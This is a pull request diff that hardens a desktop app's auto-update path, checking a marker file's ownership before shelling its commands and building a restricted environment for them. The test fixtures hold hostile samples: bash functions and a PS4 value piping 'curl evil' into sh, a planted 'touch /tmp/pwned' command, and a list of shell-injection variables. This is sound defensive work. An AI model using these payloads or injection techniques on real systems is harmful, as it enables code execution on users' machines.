### PR TITLE
fix(desktop): establish EXTERNALLY-MANAGED marker provenance before shelling it

### DIFF
--- a/docs/build/desktop-app.md
+++ b/docs/build/desktop-app.md
@@ -849,9 +849,31 @@ About panel:
 `managedBy` names the owning system in the "updates are managed by …"
 message; `updateCommand` renders as a copyable command. An empty or
 unparsable body still counts as managed — an operator who dropped the file
-gets the safe behavior even when the metadata is wrong. For local testing,
-the `KIROCREW_EXTERNALLY_MANAGED` env var points at a marker file (any other
-non-empty value marks the install managed with no metadata).
+gets the safe behavior even when the metadata is wrong.
+
+The body is only read when the marker's **provenance** can be established:
+neither the marker nor its directory may be owned by the account the app runs
+as, and neither may be group- or world-writable. Ownership rather than current
+mode bits, because a POSIX owner can always `chmod +w` back — a marker the app's
+own user owns is one a prompt-injected agent shell could have planted and then
+made read-only. `updateCommand`/`checkCommand` are executed through a shell on
+the managed auto-update path, so a marker in a user-owned resources directory
+(Homebrew, `pip --user`, `~/Applications`) is treated as a bare marker: managed,
+updater off, no metadata and nothing to run. Packagers that want the managed
+commands honored must install the resources directory root-owned.
+
+The commands run with a **constructed environment**, not the app's own. Only an explicit pass-through set reaches them — `USER`, `LOGNAME`, `TZ`, `TMPDIR`, the `LANG`/`LC_*` locale vars, and the proxy vars — plus a narrowed system-only `PATH` and `cwd=/`. `HOME` is deliberately excluded: Python derives its user-site directory from it, so passing it through would let a planted `sitecustomize.py` run on every `python` start. Everything else is absent by construction, because `shell: true` means a shell interprets the command and a shell reads its environment as code: the loader family (`LD_*`/`DYLD_*`), the interpreter family (`PYTHON*`, `NODE_OPTIONS`), the startup files (`BASH_ENV`, `ENV`), the tracing pair (`SHELLOPTS` plus a command-substituting `PS4`), word splitting (`IFS`), and exported shell functions (`BASH_FUNC_*`, which shadow a command name outright). A packager whose updater needs any other variable must set it inside its own command rather than relying on inheritance.
+
+**On Windows the marker's commands are never honored.** There is no POSIX owner
+to read and `access(W_OK)` does not model ACLs, so no honest provenance verdict
+exists; the check fails closed by declaration and every Windows marker is
+treated as bare (managed, updater off). A Windows packager drives updates with
+its own installer, not through this marker.
+
+For local testing, the `KIROCREW_EXTERNALLY_MANAGED` env var points at a marker
+file (any other non-empty value marks the install managed with no metadata).
+It is honored on unpackaged builds only — a packaged app ignores it, because
+its launch environment is user-writable.
 
 The gateway has the matching seam for its own surfaces: an operator's
 `security_policy.json` `updates` block (`check_command` / `apply_command`)

--- a/src/kiro_crew/platform/update_provider.py
+++ b/src/kiro_crew/platform/update_provider.py
@@ -242,11 +242,23 @@ def _trusted_path_env() -> dict[str, str] | None:
     # command has no business inheriting an interpreter search path.
     for var in _INJECTABLE_LOADER_VARS:
         env.pop(var, None)
+    # Exported shell FUNCTIONS are the same threat carrying an open-ended name:
+    # bash imports ``BASH_FUNC_<name>%%`` (4.3+) or ``BASH_FUNC_<name>()`` (the
+    # patched-4.2 form), and the resulting function shadows that command word
+    # outright -- beating the narrowed PATH above rather than competing in it.
+    # Matched by PREFIX because the suffix is version-specific, so neither form
+    # can be missed and no future one has to be enumerated.
+    for var in [k for k in env if k.startswith("BASH_FUNC_")]:
+        env.pop(var, None)
     return env
 
 
-#: Environment variables that make an interpreter or dynamic linker load code
-#: from a caller-controlled path. Removed from every update-command child.
+#: Environment variables that make an interpreter, a dynamic linker, or the
+#: shell itself load code from a caller-controlled path. Removed from every
+#: update-command child. ``SHELLOPTS``/``PS4`` are the shell's own pair: the
+#: command runs via ``[<sh>, "-c", ...]`` and where that ``sh`` is bash,
+#: ``SHELLOPTS=xtrace`` enables tracing while ``PS4`` is expanded with command
+#: substitution, so a payload there runs before the command does.
 _INJECTABLE_LOADER_VARS: tuple[str, ...] = (
     "PYTHONPATH",
     "PYTHONHOME",
@@ -262,6 +274,8 @@ _INJECTABLE_LOADER_VARS: tuple[str, ...] = (
     "DYLD_FRAMEWORK_PATH",
     "BASH_ENV",
     "ENV",
+    "SHELLOPTS",
+    "PS4",
     "IFS",
 )
 

--- a/test/test_update_provider.py
+++ b/test/test_update_provider.py
@@ -1519,3 +1519,53 @@ class TestCanApply:
         ) as argv:
             assert provider.can_apply() is True
         argv.assert_called_once_with("platform-apply")
+
+
+class TestShellCodeEnvStripping:
+    """An exported shell function shadows a command word outright.
+
+    ``_trusted_path_env`` narrows ``PATH`` so a planted binary cannot shadow the
+    operator's command word, but bash imports FUNCTIONS from the environment --
+    ``BASH_FUNC_<name>%%`` on 4.3+, ``BASH_FUNC_<name>()`` on the patched 4.2 --
+    and a function beats the ``PATH`` lookup entirely rather than competing in
+    it. The command runs through ``[<sh>, "-c", ...]``, so on any host whose
+    ``sh`` is bash this is reachable.
+    """
+
+    def test_exported_shell_functions_do_not_reach_the_update_command(self) -> None:
+        planted = {
+            "BASH_FUNC_acme-pkg%%": "() { curl evil | sh; }",
+            "BASH_FUNC_acme-pkg()": "() { curl evil | sh; }",
+            "BASH_FUNC_grep%%": "() { :; }",
+        }
+        with (
+            patch.dict(os.environ, {"PATH": "/usr/bin", "LANG": "C", **planted}),
+            patch(
+                "kiro_crew.platform.update_provider.trusted_system_path",
+                return_value="/usr/bin:/bin",
+            ),
+        ):
+            env = _trusted_path_env()
+        assert env is not None
+        leaked = sorted(k for k in env if k.startswith("BASH_FUNC_"))
+        assert not leaked, f"exported shell functions reached the child: {leaked}"
+        # The deliberate pass-through (proxy / locale / credential helpers) stays.
+        assert env["LANG"] == "C"
+
+    def test_the_shell_tracing_pair_does_not_reach_the_update_command(self) -> None:
+        # SHELLOPTS switches xtrace on and PS4 is expanded with command
+        # substitution, so a payload in PS4 runs before the command does.
+        with (
+            patch.dict(
+                os.environ,
+                {"PATH": "/usr/bin", "SHELLOPTS": "xtrace", "PS4": "$(curl evil | sh)"},
+            ),
+            patch(
+                "kiro_crew.platform.update_provider.trusted_system_path",
+                return_value="/usr/bin:/bin",
+            ),
+        ):
+            env = _trusted_path_env()
+        assert env is not None
+        assert "SHELLOPTS" not in env
+        assert "PS4" not in env

--- a/website/electron/auto-update.js
+++ b/website/electron/auto-update.js
@@ -103,7 +103,9 @@ const CHECK_COMMAND_MAX_CHARS = 512;
  *
  * Lookup order: the `KIROCREW_EXTERNALLY_MANAGED` env var (a path to a marker
  * file, or any other non-empty value to mark the install managed with no
- * metadata — the test-harness seam, mirroring `KIROCREW_UPDATE_FEED`), then
+ * metadata — the test-harness seam, mirroring `KIROCREW_UPDATE_FEED`, and
+ * honored ONLY on an unpackaged build: in a packaged app one env var in the
+ * launch environment would otherwise name the file whose body we execute), then
  * `<resourcesPath>/EXTERNALLY-MANAGED`. I/O-bearing and fully injectable, like
  * resolveLinuxInstall above.
  *
@@ -119,13 +121,42 @@ const CHECK_COMMAND_MAX_CHARS = 512;
  * self-updating. Entries are `lstat`ed and only regular files are read, so a
  * symlink can never route this startup-path read into a FIFO or device.
  *
+ * INTEGRITY: the metadata is only parsed when neither the marker nor its
+ * directory is OWNED by this euid or writable by group/other (see
+ * canRewriteMarker) — `updateCommand`/`checkCommand` are SHELLED, so a marker
+ * anything running as this user could rewrite is a marker that names arbitrary
+ * code to run. A rewritable marker still means MANAGED, just with no metadata:
+ * the same degenerate shape as an empty body, which leaves the updater off and
+ * nothing to execute. Windows always takes that answer (no POSIX owner to read).
+ *
  * @param {object} [o]
  * @param {object} [o.env=process.env]
  * @param {string} [o.resourcesPath=process.resourcesPath]
+ * @param {boolean} [o.isPackaged]  packaged app? gates the env-var seam off
+ * @param {(p:string)=>boolean} [o.probeMarkerRewritable=canRewriteMarker]
  * @returns {{managedBy:string, updateCommand:string, checkCommand:string}|null} null when not managed
  */
-function readExternallyManaged({ env = process.env, resourcesPath = process.resourcesPath } = {}) {
+function readExternallyManaged({
+  env = process.env,
+  resourcesPath = process.resourcesPath,
+  // Is this a PACKAGED app? Only the env-var seam consults it, and only to
+  // refuse. Resolved lazily so the module still loads outside Electron: a
+  // runtime with no `electron.app` is by definition not the packaged desktop
+  // app, which is exactly when the harness seam is allowed.
+  isPackaged = (() => {
+    try {
+      const electronApp = require("electron").app;
+      return !!(electronApp && electronApp.isPackaged);
+    } catch {
+      return false;
+    }
+  })(),
+  // Marker-integrity probe, injected for the same reason as the other probes in
+  // this module: assertable without a real read-only install directory.
+  probeMarkerRewritable = canRewriteMarker,
+} = {}) {
   let raw = null;
+  let markerPath = "";
   try {
     const fs = require("fs");
     const path = require("path");
@@ -145,20 +176,30 @@ function readExternallyManaged({ env = process.env, resourcesPath = process.reso
         return "";
       }
     };
-    const override = (env && env.KIROCREW_EXTERNALLY_MANAGED) || "";
+    // The env seam is a DEV/TEST affordance. In a packaged app the launch
+    // environment (shell profile, launchd plist, .desktop file) is writable by
+    // the user, so honoring it there would let one env var choose the file whose
+    // body this process shells.
+    const override = (!isPackaged && env && env.KIROCREW_EXTERNALLY_MANAGED) || "";
     if (override) {
       // A value that names a marker file reads it; any other non-empty value
       // (including a dangling path) marks the install managed with no metadata.
+      markerPath = override;
       raw = readMarkerAt(override);
       if (raw === null) raw = "";
     } else {
-      raw = readMarkerAt(path.join(resourcesPath || "", EXTERNALLY_MANAGED_MARKER));
+      markerPath = path.join(resourcesPath || "", EXTERNALLY_MANAGED_MARKER);
+      raw = readMarkerAt(markerPath);
       if (raw === null) return null;
     }
   } catch {
     // fs itself unavailable (non-node runtime): nothing to read, not managed.
     return null;
   }
+  // Integrity gate: a marker this process could rewrite carries no authority,
+  // so it is read as a bare marker (managed, no metadata). Deliberately BEFORE
+  // the parse, so no attacker-chosen string reaches the fields at all.
+  if (raw && probeMarkerRewritable(markerPath)) raw = "";
   let managedBy = "";
   let updateCommand = "";
   let checkCommand = "";
@@ -179,6 +220,73 @@ function readExternallyManaged({ env = process.env, resourcesPath = process.reso
     // Presence alone is the signal; a bare marker means managed, no metadata.
   }
   return { managedBy, updateCommand, checkCommand };
+}
+
+// Can THIS process rewrite the externally-managed marker?
+//
+// The marker's `updateCommand`/`checkCommand` are handed to a shell, so the
+// marker's integrity is the whole boundary between "the packager that owns this
+// install told us how to update" and "anything that can write one file told us
+// what to run". A marker we can rewrite is one a prompt-injected agent shell
+// running as this user can rewrite, so its metadata is refused.
+//
+// The question is OWNERSHIP, not the current mode bits. `access(W_OK)` answers
+// "can I write this right now", and a POSIX owner can always `chmod +w` back —
+// so on exactly the user-owned installs this exists to defend (Homebrew,
+// `pip --user`, ~/Applications) an attacker would plant the marker, `chmod 0400`
+// it, and be handed the trusted verdict. Provenance is what the metadata's
+// authority rests on, so provenance is what is probed:
+//
+//   - a file or directory OWNED by this euid is rewritable (chmod is ours),
+//   - a group- or world-writable one is rewritable by whoever else holds it, and
+//   - one the KERNEL says we can write is rewritable however that was granted.
+//
+// The third arm is not redundant with the second: POSIX mode bits do not model
+// ACLs, so a root-owned 0755 directory carrying a macOS `chmod +a` (or Linux
+// setfacl) entry for this user is writable while every mode bit reads safe.
+// access(W_OK) is the only check that sees that grant.
+//
+// Both the marker and its directory are checked, because either one controls the
+// content: a writable directory allows replacing the file outright, and a file
+// we own is rewritable even inside a directory we do not.
+//
+// Fail-CLOSED — the OPPOSITE direction to isBundleContainerWritable below. There
+// a probe that cannot run must not disable updates; here a marker whose
+// provenance cannot be established must not be executed. The cost of the safe
+// answer is only "no metadata", which is the historical bare-marker behavior.
+// Windows takes that answer UNCONDITIONALLY and by declaration: it has no POSIX
+// owner to read, and `access(W_OK)` there does not model ACLs, so there is no
+// honest verdict to give. A Windows install therefore never honors marker
+// commands; see docs/build/desktop-app.md.
+function canRewriteMarker(markerPath) {
+  try {
+    const fs = require("fs");
+    const path = require("path");
+    // No POSIX ownership to read: declared fail-closed (see note above).
+    if (process.platform === "win32" || typeof process.geteuid !== "function") return true;
+    const euid = process.geteuid();
+    // root owns everything and can chmod anything, so nothing is un-rewritable.
+    if (euid === 0) return true;
+    for (const target of [markerPath, path.dirname(markerPath)]) {
+      let st;
+      try {
+        st = fs.lstatSync(target);
+      } catch {
+        return true; // cannot establish provenance
+      }
+      if (st.uid === euid) return true;          // ours: chmod +w is ours too
+      if ((st.mode & 0o022) !== 0) return true;  // group- or world-writable
+      try {
+        fs.accessSync(target, fs.constants.W_OK);
+        return true;                             // ACL-granted write
+      } catch {
+        // Not writable by any grant the kernel knows about.
+      }
+    }
+    return false;
+  } catch {
+    return true;
+  }
 }
 
 // Can the AppImage replace itself, i.e. is the directory HOLDING the image
@@ -916,14 +1024,18 @@ function initAutoUpdate(deps) {
     // manager), we discover and apply updates by SHELLING the marker's own
     // commands.
     //
-    // TRUST / HARDENING: the EXTERNALLY-MANAGED marker is an operator/packager
-    // file under <resourcesPath>, and — unlike the Python security_policy pins,
-    // which live in a home dir a prompt-injected agent shell cannot write — it
-    // is NOT a protected trust root; on a user-writable install its directory
-    // may be writable. So we do not lean on the marker's integrity: we HARDEN
-    // EXECUTION instead (see runManagedCommand) — a narrowed system-only PATH so
-    // a planted shim on the user's PATH cannot shadow a command, cwd="/" (never
-    // the app or an inherited dir), a timeout, and bounded retained output. The
+    // TRUST / HARDENING: reaching here means the marker's metadata already
+    // passed the integrity gate in readExternallyManaged — neither the marker nor
+    // its directory is owned by this euid or writable by group/other, so it is a
+    // genuine packager artifact rather than a file a prompt-injected agent shell
+    // could have planted. That gate is
+    // what makes the commands trustworthy at all; the hardening below is about
+    // the ENVIRONMENT they run in, not about the command string (see
+    // runManagedCommand) — a narrowed system-only PATH so a planted shim on the
+    // user's PATH cannot shadow a command, a CONSTRUCTED environment so nothing
+    // the shell reads as code is inherited at all, cwd="/" (never the app or an
+    // inherited dir), a
+    // timeout, and bounded retained output. The
     // command still runs through a shell, so the writer MUST name absolute
     // binaries (a bare name will not resolve under the narrowed PATH); we NEVER
     // interpolate untrusted input. Platform-agnostic: the same path serves
@@ -964,6 +1076,54 @@ function initAutoUpdate(deps) {
             process.env.SystemRoot || "C:\\Windows",
           ].join(";")
         : "/usr/bin:/bin:/usr/sbin:/sbin";
+    // The child's environment is CONSTRUCTED, not filtered.
+    //
+    // `shell: true` means a shell interprets the command, and a shell reads its
+    // environment as code: the loader family (LD_*/DYLD_*), the interpreter
+    // family (PYTHON*, NODE_OPTIONS), the startup files (BASH_ENV, ENV), the
+    // tracing pair (SHELLOPTS plus a command-substituting PS4), word splitting
+    // (IFS), and exported shell FUNCTIONS (BASH_FUNC_* — a function shadows a
+    // command name outright, beating managedPath() rather than evading it).
+    // That namespace is open-ended and differs by shell and by version, so no
+    // denylist over it is provably complete; successive review rounds just find
+    // the next name.
+    //
+    // Naming what the child DOES get inverts that: anything absent from this
+    // list is gone by construction, so every present and future injection
+    // variable is already handled and there is no enumeration to keep current.
+    // The list carries what a packager's own updater plausibly needs — locale,
+    // temp dir, proxy — and nothing a shell or an interpreter treats as code. A
+    // packager needing more sets it inside its own command, which is the one
+    // place that requirement is visible to whoever wrote it.
+    //
+    // HOME is deliberately NOT here. It is not shell-interpreted, but it is a
+    // path an interpreter reads code from: Python derives its user-site
+    // directory from HOME, so a planted ~/.local/lib/pythonX/site-packages/
+    // sitecustomize.py executes on every `python` start. Passing HOME would
+    // re-open the startup-injection class for any marker command that happens to
+    // be a Python program, which is the class this whole construction closes.
+    const MANAGED_ENV_PASSTHROUGH = [
+      "USER", "LOGNAME", "TZ", "TMPDIR",
+      "LANG", "LC_ALL", "LC_CTYPE",
+      "HTTP_PROXY", "HTTPS_PROXY", "NO_PROXY",
+      "http_proxy", "https_proxy", "no_proxy",
+    ];
+    // cmd.exe cannot start without these, so the win32 lane mirrors
+    // managedPath()'s win32 branch rather than handing it a shell it cannot run.
+    const MANAGED_ENV_PASSTHROUGH_WIN32 = [
+      "SystemRoot", "SystemDrive", "windir", "COMSPEC",
+      "PATHEXT", "TEMP", "TMP", "USERPROFILE", "APPDATA", "LOCALAPPDATA",
+    ];
+    const managedEnv = () => {
+      const e = { PATH: managedPath() };
+      const keys = process.platform === "win32"
+        ? [...MANAGED_ENV_PASSTHROUGH, ...MANAGED_ENV_PASSTHROUGH_WIN32]
+        : MANAGED_ENV_PASSTHROUGH;
+      for (const k of keys) {
+        if (process.env[k] !== undefined) e[k] = process.env[k];
+      }
+      return e;
+    };
 
     // Run a marker command through the platform shell, resolving to
     // {code, out} (combined stdout+stderr, capped). Never rejects: spawn errors
@@ -1007,7 +1167,7 @@ function initAutoUpdate(deps) {
         child = cp.spawn(command, { // nosemgrep: javascript.lang.security.detect-child-process.detect-child-process
           shell: true,
           cwd: "/",
-          env: { ...process.env, PATH: managedPath() },
+          env: managedEnv(),
           ...(timeout ? { timeout } : {}),
         });
       } catch (err) {
@@ -1951,6 +2111,7 @@ module.exports = {
   manualDownloadUrl,
   resolveLinuxInstall,
   readExternallyManaged,
+  canRewriteMarker,
   DEFAULT_FEED_BASE,
   DOWNLOAD_BASE,
   SUPPORTED_PLATFORMS,

--- a/website/electron/test/auto-update.test.js
+++ b/website/electron/test/auto-update.test.js
@@ -10,6 +10,7 @@ const {
   buildFeedBase,
   configureUpdater,
   readExternallyManaged,
+  canRewriteMarker,
   DEFAULT_FEED_BASE,
   SUPPORTED_PLATFORMS,
 } = require("../auto-update");
@@ -867,10 +868,14 @@ const cpModule = require("node:child_process");
 // {code, out}. Returns a restore fn + the recorded command list.
 function stubSpawn(script) {
   const commands = [];
+  // Spawn OPTIONS per call, so a test can assert the hardened environment the
+  // marker's command runs in and not only which command ran.
+  const optsList = [];
   const orig = cpModule.spawn;
   const { EventEmitter } = require("node:events");
-  cpModule.spawn = (command, _opts) => {
+  cpModule.spawn = (command, opts) => {
     commands.push(command);
+    optsList.push(opts);
     const child = new EventEmitter();
     child.stdout = new EventEmitter();
     child.stderr = new EventEmitter();
@@ -888,7 +893,7 @@ function stubSpawn(script) {
     });
     return child;
   };
-  return { commands, restore: () => { cpModule.spawn = orig; } };
+  return { commands, optsList, restore: () => { cpModule.spawn = orig; } };
 }
 
 test("managed check() with updateCommand+checkCommand emits found with the printed version", async (t) => {
@@ -1194,7 +1199,13 @@ test("readExternallyManaged: JSON marker carries metadata", (t) => {
     path.join(dir, "EXTERNALLY-MANAGED"),
     JSON.stringify({ managedBy: "internal-registry", updateCommand: "pkgtool update kirocrew" }),
   );
-  assert.deepStrictEqual(readExternallyManaged({ env: {}, resourcesPath: dir }), {
+  // probeMarkerRewritable: this test is about PARSING a trusted marker; the
+  // integrity gate itself is covered by the writability tests below.
+  assert.deepStrictEqual(readExternallyManaged({
+    env: {},
+    resourcesPath: dir,
+    probeMarkerRewritable: () => false,
+  }), {
     managedBy: "internal-registry",
     updateCommand: "pkgtool update kirocrew",
     checkCommand: "",
@@ -1269,7 +1280,11 @@ test("readExternallyManaged: metadata fields are length-capped", (t) => {
     path.join(dir, "EXTERNALLY-MANAGED"),
     JSON.stringify({ managedBy: "m".repeat(500), updateCommand: "c".repeat(2000), checkCommand: "k".repeat(2000) }),
   );
-  const got = readExternallyManaged({ env: {}, resourcesPath: dir });
+  const got = readExternallyManaged({
+    env: {},
+    resourcesPath: dir,
+    probeMarkerRewritable: () => false,
+  });
   assert.strictEqual(got.managedBy.length, 128);
   assert.strictEqual(got.updateCommand.length, 512);
   assert.strictEqual(got.checkCommand.length, 512);
@@ -1286,8 +1301,314 @@ test("readExternallyManaged: env override points at a marker file", (t) => {
   const got = readExternallyManaged({
     env: { KIROCREW_EXTERNALLY_MANAGED: marker },
     resourcesPath: "/nonexistent",
+    probeMarkerRewritable: () => false,
   });
   assert.deepStrictEqual(got, { managedBy: "harness", updateCommand: "", checkCommand: "" });
+});
+
+// ---------------------------------------------------------------------------
+// Marker INTEGRITY. The marker's updateCommand/checkCommand are shelled, and the
+// background launch check fires them with no user action, so the marker is an
+// execution trust root: one file write under a user-writable <resourcesPath>
+// (Homebrew, `pip --user`, ~/Applications) would otherwise be arbitrary code
+// execution in the desktop app. These exercise the REAL probe -- no injected
+// seam -- because a test that only greps for the call would execute none of it.
+// ---------------------------------------------------------------------------
+
+// Root can chmod and rewrite anything, so the probe correctly answers
+// "rewritable" for every path and a trusted-marker case has nothing to assert.
+// Windows has no POSIX owner to read and is declared fail-closed.
+const canTestOwnership = process.platform !== "win32"
+  && typeof process.geteuid === "function" && process.geteuid() !== 0;
+
+// A real path this account does NOT own and cannot chmod, used as the trusted
+// marker case. Resolved from the filesystem rather than hard-coded so the test
+// asserts only when its own precondition genuinely holds.
+function foreignOwnedPath() {
+  if (!canTestOwnership) return "";
+  const fs = require("node:fs");
+  const path = require("node:path");
+  const euid = process.geteuid();
+  for (const candidate of ["/usr/bin/env", "/bin/sh", "/usr/lib/os-release"]) {
+    try {
+      const st = fs.lstatSync(candidate);
+      const dir = fs.lstatSync(path.dirname(candidate));
+      if (st.uid !== euid && dir.uid !== euid
+        && (st.mode & 0o022) === 0 && (dir.mode & 0o022) === 0) return candidate;
+    } catch {
+      // try the next candidate
+    }
+  }
+  return "";
+}
+
+test("readExternallyManaged: a marker in a USER-WRITABLE dir yields NO metadata", (t) => {
+  const fs = require("node:fs");
+  const os = require("node:os");
+  const path = require("node:path");
+  const dir = fs.mkdtempSync(path.join(os.tmpdir(), "kc-ext-"));
+  t.after(() => fs.rmSync(dir, { recursive: true, force: true }));
+  fs.writeFileSync(
+    path.join(dir, "EXTERNALLY-MANAGED"),
+    JSON.stringify({
+      managedBy: "attacker",
+      updateCommand: "/bin/sh -c 'touch /tmp/pwned'",
+      checkCommand: "/bin/sh -c 'touch /tmp/pwned'",
+    }),
+  );
+  // Still MANAGED (the updater stays off) but the commands are refused: this is
+  // the historical bare-marker shape.
+  assert.deepStrictEqual(readExternallyManaged({ env: {}, resourcesPath: dir }), {
+    managedBy: "",
+    updateCommand: "",
+    checkCommand: "",
+  });
+});
+
+test("readExternallyManaged: chmod 0400 on an OWNED marker does not buy trust", (t) => {
+  // The bypass the mode-bit version of this gate had: the owner can always
+  // chmod +w back, so read-only-right-now is not provenance. An agent shell
+  // plants the marker, makes it 0400 in a 0500 dir, and must still be refused.
+  if (!canTestOwnership) {
+    t.skip("needs a non-root POSIX host: root can rewrite anything");
+    return;
+  }
+  const fs = require("node:fs");
+  const os = require("node:os");
+  const path = require("node:path");
+  const dir = fs.mkdtempSync(path.join(os.tmpdir(), "kc-ext-"));
+  t.after(() => {
+    fs.chmodSync(dir, 0o700);
+    fs.rmSync(dir, { recursive: true, force: true });
+  });
+  const marker = path.join(dir, "EXTERNALLY-MANAGED");
+  fs.writeFileSync(marker, JSON.stringify({
+    managedBy: "attacker",
+    updateCommand: "/bin/sh -c 'touch /tmp/pwned'",
+    checkCommand: "/bin/sh -c 'touch /tmp/pwned'",
+  }));
+  fs.chmodSync(marker, 0o400); // "not writable" -- but still ours
+  fs.chmodSync(dir, 0o500);    // ditto
+  assert.deepStrictEqual(readExternallyManaged({ env: {}, resourcesPath: dir }), {
+    managedBy: "",
+    updateCommand: "",
+    checkCommand: "",
+  });
+});
+
+test("canRewriteMarker: a marker we do NOT own and cannot chmod is trusted", (t) => {
+  // The positive half: without this the gate could refuse everything and still
+  // pass every negative test. Asserted against a real foreign-owned path (the
+  // shape a root-owned system install has) rather than a fabricated one.
+  const foreign = foreignOwnedPath();
+  if (!foreign) {
+    t.skip("no foreign-owned path available on this host");
+    return;
+  }
+  assert.strictEqual(canRewriteMarker(foreign), false,
+    `${foreign} is owned by another account in a directory we cannot write`);
+});
+
+test("canRewriteMarker: ownership is what is probed, not the mode bits", (t) => {
+  if (!canTestOwnership) {
+    t.skip("needs a non-root POSIX host: root can rewrite anything");
+    return;
+  }
+  const fs = require("node:fs");
+  const os = require("node:os");
+  const path = require("node:path");
+  const dir = fs.mkdtempSync(path.join(os.tmpdir(), "kc-ext-"));
+  t.after(() => {
+    fs.chmodSync(dir, 0o700);
+    fs.rmSync(dir, { recursive: true, force: true });
+  });
+  const marker = path.join(dir, "EXTERNALLY-MANAGED");
+  fs.writeFileSync(marker, "{}");
+  // Every mode an owner can set still answers "rewritable", because chmod is
+  // ours: 0600 (plainly writable), 0400 (read-only file), 0000 (no bits at all).
+  for (const mode of [0o600, 0o400, 0o000]) {
+    fs.chmodSync(marker, mode);
+    assert.strictEqual(canRewriteMarker(marker), true, `mode ${mode.toString(8)} is still ours`);
+  }
+  fs.chmodSync(marker, 0o600);
+  // A marker that is absent cannot have its provenance established either.
+  assert.strictEqual(canRewriteMarker(path.join(dir, "nope")), true);
+});
+
+test("canRewriteMarker: an ACL-granted write is rewritable even at a safe mode", (t) => {
+  // POSIX mode bits do not model ACLs, so ownership + mode alone would call a
+  // root-owned 0755 dir carrying a `chmod +a`/setfacl grant for this user
+  // "not rewritable". A two-uid ACL fixture is not constructible in a test (it
+  // needs a directory this account does not own), so the arm is asserted as a
+  // DECLARED property, the same way the win32 branch below is.
+  const js = require("node:fs").readFileSync(require.resolve("../auto-update"), "utf8");
+  const probe = js.slice(js.indexOf("function canRewriteMarker"));
+  assert.match(probe.slice(0, probe.indexOf("\n}")),
+    /fs\.accessSync\(target, fs\.constants\.W_OK\);\s*\n\s*return true;/,
+    "the probe must ask the kernel, not only the mode bits");
+  // And the arm must not over-refuse: a foreign-owned path with no grant to us
+  // still reads as trusted (covered positively above, re-asserted here against
+  // the same subject so a broadened arm cannot pass silently).
+  const foreign = foreignOwnedPath();
+  if (!foreign) {
+    t.diagnostic("no foreign-owned path available to re-assert the trusted case");
+    return;
+  }
+  assert.strictEqual(canRewriteMarker(foreign), false);
+});
+
+test("canRewriteMarker: Windows is fail-closed by declaration", () => {
+  // No POSIX owner to read and access(W_OK) does not model ACLs, so there is no
+  // honest verdict; every Windows marker is refused. Asserted as a DECLARED
+  // property so it cannot silently become an accident.
+  const js = require("node:fs").readFileSync(require.resolve("../auto-update"), "utf8");
+  assert.match(js, /if \(process\.platform === "win32" \|\| typeof process\.geteuid !== "function"\) return true;/,
+    "the win32 branch must return 'rewritable' before any stat is attempted");
+  if (process.platform === "win32") {
+    const os = require("node:os");
+    assert.strictEqual(canRewriteMarker(require("node:path").join(os.tmpdir(), "EXTERNALLY-MANAGED")), true);
+  }
+});
+
+test("readExternallyManaged: a PACKAGED app ignores KIROCREW_EXTERNALLY_MANAGED", (t) => {
+  const fs = require("node:fs");
+  const os = require("node:os");
+  const path = require("node:path");
+  const dir = fs.mkdtempSync(path.join(os.tmpdir(), "kc-ext-"));
+  const empty = fs.mkdtempSync(path.join(os.tmpdir(), "kc-res-"));
+  t.after(() => {
+    fs.rmSync(dir, { recursive: true, force: true });
+    fs.rmSync(empty, { recursive: true, force: true });
+  });
+  const marker = path.join(dir, "custom-marker.json");
+  fs.writeFileSync(marker, JSON.stringify({ managedBy: "env", updateCommand: "/bin/false" }));
+  // The env var names a marker the probe would trust, yet a packaged app must
+  // not consult it at all: the launch environment is user-writable.
+  assert.strictEqual(
+    readExternallyManaged({
+      env: { KIROCREW_EXTERNALLY_MANAGED: marker },
+      resourcesPath: empty,
+      isPackaged: true,
+      probeMarkerRewritable: () => false,
+    }),
+    null,
+    "packaged: the env seam is off and the real resources dir has no marker",
+  );
+  // Unpackaged (the harness case) still honors it.
+  assert.deepStrictEqual(
+    readExternallyManaged({
+      env: { KIROCREW_EXTERNALLY_MANAGED: marker },
+      resourcesPath: empty,
+      isPackaged: false,
+      probeMarkerRewritable: () => false,
+    }),
+    { managedBy: "env", updateCommand: "/bin/false", checkCommand: "" },
+  );
+});
+
+test("managed updater: a rewritable marker never arms the background check", async (t) => {
+  // End-to-end wiring: the launch timer fires managedCheck() 30s after start
+  // with no user action, so an unverified marker must never reach that path.
+  const fs = require("node:fs");
+  const os = require("node:os");
+  const path = require("node:path");
+  const dir = fs.mkdtempSync(path.join(os.tmpdir(), "kc-ext-"));
+  t.after(() => fs.rmSync(dir, { recursive: true, force: true }));
+  fs.writeFileSync(
+    path.join(dir, "EXTERNALLY-MANAGED"),
+    JSON.stringify({
+      managedBy: "attacker",
+      updateCommand: "/bin/sh -c 'touch /tmp/pwned'",
+      checkCommand: "/bin/sh -c 'touch /tmp/pwned'",
+    }),
+  );
+  // externallyManaged left UNSET so the module reads the real marker from disk.
+  const { deps } = makeDeps({ resourcesPath: dir });
+  delete deps.externallyManaged;
+  const realST = global.setTimeout;
+  const realSI = global.setInterval;
+  let timerArmed = false;
+  let pollArmed = false;
+  global.setTimeout = (fn, ms) => { timerArmed = true; return realST(fn, ms); };
+  global.setInterval = (fn, ms) => { pollArmed = true; return realSI(fn, ms); };
+  const { commands, restore } = stubSpawn({ code: 0, out: "9.9.9" });
+  t.after(() => { global.setTimeout = realST; global.setInterval = realSI; restore(); });
+  const u = initAutoUpdate(deps);
+  global.setTimeout = realST;
+  global.setInterval = realSI;
+  assert.strictEqual(u.disabled, "externally-managed",
+    "a rewritable marker is managed-with-no-metadata, so the updater is off");
+  assert.strictEqual(timerArmed, false, "no launch check may be scheduled");
+  assert.strictEqual(pollArmed, false, "no background poll may be armed");
+  // And the explicit surfaces are inert too.
+  await u.check();
+  await u.download();
+  await u.install();
+  assert.deepStrictEqual(commands, [], "no marker command may ever be shelled");
+});
+
+// Everything a shell reads as code. The managed command's environment is
+// CONSTRUCTED, so none of these can reach it whether or not it is named here --
+// this list is the adversary's side of the contract, not the implementation's.
+const SHELL_CODE_VARS = [
+  "PYTHONPATH", "PYTHONHOME", "PYTHONSTARTUP", "PYTHONEXECUTABLE", "PYTHONUSERBASE",
+  "PYTHONWARNINGS", "LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT", "DYLD_INSERT_LIBRARIES",
+  "DYLD_LIBRARY_PATH", "DYLD_FRAMEWORK_PATH", "BASH_ENV", "ENV", "SHELLOPTS", "PS4",
+  "IFS", "NODE_OPTIONS", "BASHOPTS", "PERL5OPT", "RUBYOPT",
+  "BASH_FUNC_check%%", "BASH_FUNC_apply()", "BASH_FUNC_grep%%",
